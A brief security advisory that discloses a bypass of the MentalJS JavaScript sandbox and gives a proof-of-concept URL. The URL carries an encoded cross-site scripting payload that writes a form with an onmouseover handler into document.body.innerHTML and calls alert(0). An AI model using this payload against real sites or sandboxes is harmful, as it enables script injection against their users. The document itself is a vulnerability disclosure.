#Title: Mental JS Sandbox Bypass
# Product: Mental JS
# Author: Rafay Baloch And Gliuseppe Trotta (@guitro)
# Company: RHAINFOSEC
# Website: http://services.rafayhackingarticles.net

============
Description
============

Mentaljs is a js sandbox created by Gareth Heyes, the JS sandbox is
inserted at beginning of the html response, therefore preventing the
attacker to access dom elements.

============
Vulnerability
============

It was still possible to access DOM elements with mental js enabled by
executing javascript via document.inner.HTML property.


================
Proof of concept
================

The POC is as follows:

http://www.modsecurity.org/demo/demo-deny-noescape.html?test=%3Cscript%3Edocument.body.innerHTML=%22%3Cform+onmouseover=javascript:alert(0);%3E%3Cinput+name=attributes%3E%22;%3C/script%3E